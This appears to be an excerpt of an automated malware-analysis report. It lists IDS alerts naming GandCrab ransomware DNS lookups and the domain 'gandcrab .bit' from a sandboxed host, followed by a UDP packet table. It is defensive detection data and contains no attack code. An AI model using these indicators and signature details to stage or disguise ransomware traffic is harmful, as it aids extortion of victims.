192.168.2.68.8.8.856430532829498 08/31/22-23:50:42.033912	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56430	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856573532829500 08/31/22-23:49:21.437590	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56573	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859886532829498 08/31/22-23:49:13.428276	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59886	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855631532829498 08/31/22-23:49:19.625742	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55631	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854202532026737 08/31/22-23:50:33.636817	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54202	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854301532829500 08/31/22-23:50:47.037037	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54301	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851774532829498 08/31/22-23:50:06.176893	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51774	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854884532829498 08/31/22-23:50:45.706056	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54884	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849237532026737 08/31/22-23:49:22.906523	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49237	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857520532829498 08/31/22-23:49:46.246339	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57520	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856128532829498 08/31/22-23:49:24.926548	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56128	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862541532026737 08/31/22-23:50:35.901068	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62541	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849337532829498 08/31/22-23:50:15.074780	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	49337	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862543532829498 08/31/22-23:48:47.529672	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62543	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860001532026737 08/31/22-23:50:04.504698	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60001	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862540532829498 08/31/22-23:48:47.468455	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62540	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857325532026737 08/31/22-23:49:33.986496	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	57325	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853946532829498 08/31/22-23:49:03.959032	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53946	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853593532829498 08/31/22-23:50:12.431169	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53593	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849334532829498 08/31/22-23:50:15.005623	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	49334	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856434532829500 08/31/22-23:50:42.427928	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56434	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864966532829498 08/31/22-23:50:19.899743	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64966	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850345532026737 08/31/22-23:49:17.315311	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50345	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862769532829498 08/31/22-23:49:54.349513	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62769	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856297532829500 08/31/22-23:50:22.360506	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56297	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856125532829498 08/31/22-23:49:24.863671	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56125	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852819532829500 08/31/22-23:50:07.952331	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52819	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861174532026737 08/31/22-23:50:41.125728	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61174	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862041532829498 08/31/22-23:50:38.028308	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62041	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854908532829500 08/31/22-23:48:50.285779	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54908	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861091532026737 08/31/22-23:49:53.336151	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61091	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852720532026737 08/31/22-23:50:01.261421	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52720	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859340532829500 08/31/22-23:49:59.107861	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59340	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856090532829500 08/31/22-23:49:06.157622	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56090	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860131532829498 08/31/22-23:49:54.397250	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	60131	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862226532829498 08/31/22-23:50:03.343591	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62226	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857326532026737 08/31/22-23:49:34.009679	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	57326	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859341532829500 08/31/22-23:49:59.128177	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59341	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862735532829500 08/31/22-23:49:54.851676	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62735	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851889532829498 08/31/22-23:50:24.330289	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51889	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856436532829500 08/31/22-23:50:42.466214	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56436	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849336532829498 08/31/22-23:50:15.044470	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	49336	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851323532829500 08/31/22-23:49:50.073092	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51323	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863266532829500 08/31/22-23:50:03.897271	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63266	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851776532829498 08/31/22-23:50:06.216035	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51776	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864800532829500 08/31/22-23:50:34.865341	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64800	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856550532026737 08/31/22-23:49:08.378525	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56550	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851892532829498 08/31/22-23:50:24.391367	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51892	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859338532829500 08/31/22-23:49:59.065543	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59338	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852846532026737 08/31/22-23:50:18.728478	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52846	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863673532829500 08/31/22-23:50:38.460458	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63673	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857519532829498 08/31/22-23:49:46.227969	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57519	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851532532026737 08/31/22-23:48:55.006743	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51532	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854203532026737 08/31/22-23:50:33.657267	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54203	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862038532829498 08/31/22-23:50:37.962895	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62038	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862540532026737 08/31/22-23:50:35.877444	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62540	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861094532026737 08/31/22-23:49:53.390900	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61094	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855959532026737 08/31/22-23:49:42.870749	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55959	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849470532026737 08/31/22-23:50:44.362254	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49470	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850256532829498 08/31/22-23:50:34.205420	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50256	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856429532829498 08/31/22-23:50:42.013339	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56429	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849469532026737 08/31/22-23:50:44.340126	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49469	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852868532829500 08/31/22-23:49:26.794257	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52868	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854905532829500 08/31/22-23:48:50.163893	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54905	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860000532026737 08/31/22-23:50:04.486610	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60000	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862851532829500 08/31/22-23:49:39.232388	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62851	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852485532026737 08/31/22-23:49:02.321191	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52485	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861614532829500 08/31/22-23:49:00.931789	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	61614	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864545532026737 08/31/22-23:50:11.805562	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64545	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850346532026737 08/31/22-23:49:17.336643	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50346	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862853532829500 08/31/22-23:49:39.272143	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62853	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854205532026737 08/31/22-23:50:33.702038	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54205	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856361532829500 08/31/22-23:50:13.505571	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56361	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863675532829500 08/31/22-23:50:38.501186	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63675	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857517532829498 08/31/22-23:49:46.187199	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57517	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856091532829500 08/31/22-23:49:06.177940	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56091	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854300532829500 08/31/22-23:50:47.016428	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54300	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854907532829500 08/31/22-23:48:50.267487	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54907	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852848532026737 08/31/22-23:50:18.768533	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52848	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856088532829500 08/31/22-23:49:06.118498	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56088	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851325532829500 08/31/22-23:49:50.167078	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51325	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856300532829500 08/31/22-23:50:22.423249	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56300	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849236532026737 08/31/22-23:49:22.885858	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49236	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858161532829500 08/31/22-23:50:17.209347	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58161	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850254532829498 08/31/22-23:50:34.167189	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50254	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856753532829498 08/31/22-23:49:57.561313	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56753	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860694532026737 08/31/22-23:49:57.058875	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60694	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851535532026737 08/31/22-23:48:55.066318	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51535	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861612532829500 08/31/22-23:49:00.891035	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	61612	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856432532829498 08/31/22-23:50:42.072023	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56432	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864965532829498 08/31/22-23:50:19.877923	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64965	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860002532026737 08/31/22-23:50:04.523120	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60002	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857324532026737 08/31/22-23:49:33.965954	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	57324	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858921532829500 08/31/22-23:49:15.846001	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58921	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860692532026737 08/31/22-23:49:57.020058	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60692	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862542532026737 08/31/22-23:50:35.921513	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62542	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856126532829498 08/31/22-23:49:24.882022	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56126	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864964532829498 08/31/22-23:50:19.857963	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64964	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856298532829500 08/31/22-23:50:22.380545	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56298	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862768532829498 08/31/22-23:49:54.327766	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62768	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860003532026737 08/31/22-23:50:04.543015	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60003	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853595532829498 08/31/22-23:50:12.473746	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53595	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861092532026737 08/31/22-23:49:53.354265	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61092	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854298532829500 08/31/22-23:50:46.975693	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54298	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856433532829500 08/31/22-23:50:42.407533	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56433	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850347532026737 08/31/22-23:49:17.355597	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50347	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854299532829500 08/31/22-23:50:46.996273	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54299	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861172532026737 08/31/22-23:50:41.082366	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61172	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853594532829498 08/31/22-23:50:12.453787	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53594	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864406532829498 08/31/22-23:49:37.435154	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64406	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862542532829498 08/31/22-23:48:47.509378	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62542	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850257532829498 08/31/22-23:50:34.225599	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50257	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856299532829500 08/31/22-23:50:22.403218	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56299	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851890532829498 08/31/22-23:50:24.350751	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51890	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862541532829498 08/31/22-23:48:47.488892	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62541	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855961532026737 08/31/22-23:49:42.910756	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55961	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856755532829498 08/31/22-23:49:57.601932	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56755	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856127532829498 08/31/22-23:49:24.900788	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56127	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853197532829498 08/31/22-23:50:30.133681	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53197	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851533532026737 08/31/22-23:48:55.025305	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51533	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861093532026737 08/31/22-23:49:53.372548	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61093	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855633532829498 08/31/22-23:49:19.667081	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55633	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858162532829500 08/31/22-23:50:17.227551	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58162	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856431532829498 08/31/22-23:50:42.053871	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56431	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852870532829500 08/31/22-23:49:26.845476	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52870	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858159532829500 08/31/22-23:50:17.168323	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58159	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853046532829500 08/31/22-23:50:24.891150	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53046	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853043532829500 08/31/22-23:50:24.832633	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53043	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859884532829498 08/31/22-23:49:13.387386	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59884	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851367532026737 08/31/22-23:50:14.061249	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51367	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858919532829500 08/31/22-23:49:15.787076	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58919	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862737532829500 08/31/22-23:49:54.897559	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62737	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864651532026737 08/31/22-23:50:23.369931	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64651	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856572532829500 08/31/22-23:49:21.410257	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56572	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858922532829500 08/31/22-23:49:15.872217	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58922	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864546532026737 08/31/22-23:50:11.917623	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64546	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863268532829500 08/31/22-23:50:03.935068	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63268	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849467532026737 08/31/22-23:50:44.300593	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49467	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856089532829500 08/31/22-23:49:06.139177	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56089	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854882532829498 08/31/22-23:50:45.662904	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54882	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854512532026737 08/31/22-23:50:27.967773	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54512	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859339532829500 08/31/22-23:49:59.087833	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	59339	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862770532829498 08/31/22-23:49:54.371674	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62770	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856752532829498 08/31/22-23:49:57.536553	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56752	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852719532026737 08/31/22-23:50:01.237344	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52719	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856362532829500 08/31/22-23:50:13.529988	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56362	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852820532829500 08/31/22-23:50:08.063038	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52820	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854204532026737 08/31/22-23:50:33.679529	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54204	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864409532829498 08/31/22-23:49:37.527288	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64409	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864543532026737 08/31/22-23:50:11.740058	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64543	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852483532026737 08/31/22-23:49:02.284760	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52483	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853948532829498 08/31/22-23:49:04.012398	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53948	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862224532829498 08/31/22-23:50:03.259743	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62224	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851326532829500 08/31/22-23:49:50.186179	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51326	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860012532829500 08/31/22-23:50:33.110094	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60012	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861611532829500 08/31/22-23:49:00.850076	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	61611	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851364532026737 08/31/22-23:50:13.994431	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51364	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849235532026737 08/31/22-23:49:22.865636	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49235	53	192.168.2.6	8.8.8.8

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2022 23:48:44.116539001 CEST	63229	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:44.136054039 CEST	53	63229	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:45.117125034 CEST	62538	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:46.120923042 CEST	62538	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:47.148174047 CEST	62538	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:47.429773092 CEST	53	62538	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:47.446198940 CEST	62539	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:47.465388060 CEST	53	62539	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:47.468455076 CEST	62540	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:47.488225937 CEST	53	62540	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:47.488892078 CEST	62541	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:47.508804083 CEST	53	62541	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:47.509377956 CEST	62542	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:47.529036045 CEST	53	62542	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:47.529671907 CEST	62543	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:47.549340963 CEST	53	62543	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:48.691446066 CEST	54903	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:49.264957905 CEST	53	62538	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:49.961707115 CEST	54903	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:49.988116026 CEST	53	54903	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:50.135879040 CEST	53	62538	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:50.144049883 CEST	54904	53	192.168.2.6	8.8.8.8
